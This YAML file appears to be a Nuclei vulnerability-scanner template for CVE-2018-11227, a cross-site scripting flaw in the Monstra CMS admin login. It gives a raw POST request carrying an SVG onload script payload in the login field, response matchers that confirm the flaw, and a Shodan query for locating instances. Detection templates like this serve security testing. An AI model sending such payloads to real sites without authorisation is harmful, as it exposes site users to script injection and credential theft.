nuclei-templates/http/cves/2018/CVE-2018-11227.yaml

59 lines
1.8 KiB
YAML

id: CVE-2018-11227
info:
name: Monstra CMS <=3.0.4 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
Monstra CMS 3.0.4 and earlier contains a cross-site scripting vulnerability via index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: |
Upgrade Monstra CMS to a version higher than 3.0.4 or apply the official patch provided by the vendor.
reference:
- https://github.com/monstra-cms/monstra/issues/438
- https://www.exploit-db.com/exploits/44646
- https://nvd.nist.gov/vuln/detail/CVE-2018-11227
- https://github.com/monstra-cms/monstra/issues
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-11227
cwe-id: CWE-79
epss-score: 0.02667
epss-percentile: 0.89204
cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: monstra
product: monstra_cms
shodan-query: http.favicon.hash:419828698
tags: cve,cve2018,xss,mostra,mostracms,cms,edb
http:
- raw:
- |
POST /admin/index.php?id=pages HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
login="><svg/onload=alert(document.domain)>&password=xxxxxx&login_submit=Log+In
matchers-condition: and
matchers:
- type: word
part: body
words:
- "><svg/onload=alert(document.domain)>"
- "Monstra"
case-insensitive: true
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200